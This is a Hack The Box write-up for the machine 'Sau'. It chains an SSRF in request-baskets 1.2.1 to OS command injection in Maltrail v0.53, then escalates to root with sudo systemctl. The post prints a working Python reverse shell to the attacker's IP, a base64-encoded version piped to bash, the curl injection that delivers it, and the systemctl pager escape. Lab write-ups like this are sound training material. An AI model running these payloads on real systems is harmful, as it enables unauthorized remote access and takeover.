remoteshell.zip
Posts Tags Categories
remoteshell.zip

HTB: Sau

 included in  categories HTB CTF
     531 words   3 minutes 

Easy HTB machine with a SSRF vulnerability that gives access to OS command injection in mailtrail.

port 22, and 55555 are open. Port 80 and 8338 are filtered.

DuxSec@hi$ nmap -sV -sS -p- -v -oN nmap_all_ports 10.10.11.224 Nmap scan report for 10.10.11.224 Host is up (0.032s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) 80/tcp filtered http 8338/tcp filtered unknown 55555/tcp open unknown

Port 80 is not accessible.

It shows a website that is running request-basket version 1.2.1.

Image alt

A quick google for request basket 1.2.1 exploit shows a CVE for SSRF: https://gist.github.com/b33t1e/3079c10c88cad379fb166c389ce3b7b3. Details can be read here.

Image alt

Image alt

Image alt

In the top bar I can open the settings.

Image alt

That brings up the following configuration settings, here the SSRF vulnerability can be abused by setting it to localhost (127.0.0.1) on port 80 (remember the nmap port scan showed port 80 filtered).

Make sure proxy response is ticked.

Image alt

This will make the requests that are sent to http://10.10.11.224:55555/basket123 be forwarded to the internal http://127.0.0.1:80 url.

Browsing to http://10.10.11.224:55555/basket123 shows the following page.

At the bottom of the page it shows that it is powered by mailtrail v0.53.

Googling mailtrail v0.53 exploit, shows the following website that explains the OS command injection vulnerability in mailtrail v0.53.
https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/.

POC from huntr.dev

bash

curl 'http://hostname:8338/login' \
  --data 'username=;`id > /tmp/bbq`'

This shows that we can execute commands after the username.

First I need to change the settings url to /login

Let’s try to get a reverse shell.

Using payloadallthethings python reverse shell

python

python3 -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.196",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'

I will base64 encode this payload so it can be transferred correctly.

DuxSec@hi$ cat reverse_shell.py | base64 -w 0 cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjE5NiIsNDI0MikpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdLHN0ZGluPXMuZmlsZW5vKCksc3Rkb3V0PXMuZmlsZW5vKCksc3RkZXJyPXMuZmlsZW5vKCkpJwo=

-w 0 = disable line wrapping

In order to execute this on the system, we need to decode it back to base64 and run it.

bash

echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjE5NiIsNDI0MikpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdLHN0ZGluPXMuZmlsZW5vKCksc3Rkb3V0PXMuZmlsZW5vKCksc3RkZXJyPXMuZmlsZW5vKCkpJwo=|base64 -d|bash

Now I need to insert that into the payload in curl.

DuxSec@hi$ curl 'http://10.10.11.224:55555/basket123' --data 'username=;`echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjE5NiIsNDI0MikpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdLHN0ZGluPXMuZmlsZW5vKCksc3Rkb3V0PXMuZmlsZW5vKCksc3RkZXJyPXMuZmlsZW5vKCkpJwo=|base64 -d|bash`'

I start my nc listeren and run the curl command, and recieve a shell as puma.

DuxSec@hi$ nc -lnvp 4242 listening on [any] 4242 ... connect to [10.10.14.196] from (UNKNOWN) [10.10.11.224] 50712 /bin/sh: 0: can't access tty; job control turned off $ whoami puma
$ cd ~ $ ls linpeas.sh user.txt $ cat user.txt 6277461a7719f********

Running sudo -l shows that the current user is allowed to run /usr/bin/systemctl status trail.service as sudo.

$ sudo -l Matching Defaults entries for puma on sau: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User puma may run the following commands on sau: (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

A quick GTFO bins search shows how I can escalate my privileges GTFObins systemctl.

For the privilege escalation, a interactive shell is required, if you don’t know how to do this; (Read this )[https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/]

Running sudo systemctl status trail.service followed by !sh gives me a root shell.

puma@sau:/opt/maltrail$ sudo systemctl status trail.service sudo systemctl status trail.service WARNING: terminal is not fully functional - (press RETURN)!sh !sshh!sh # whoami whoami root # cat /root/root.txt cat /root/root.txt f3f250***********
Updated on 03 Nov 2024
Read markdown
 HTBNmapPython3SSRF
 | Home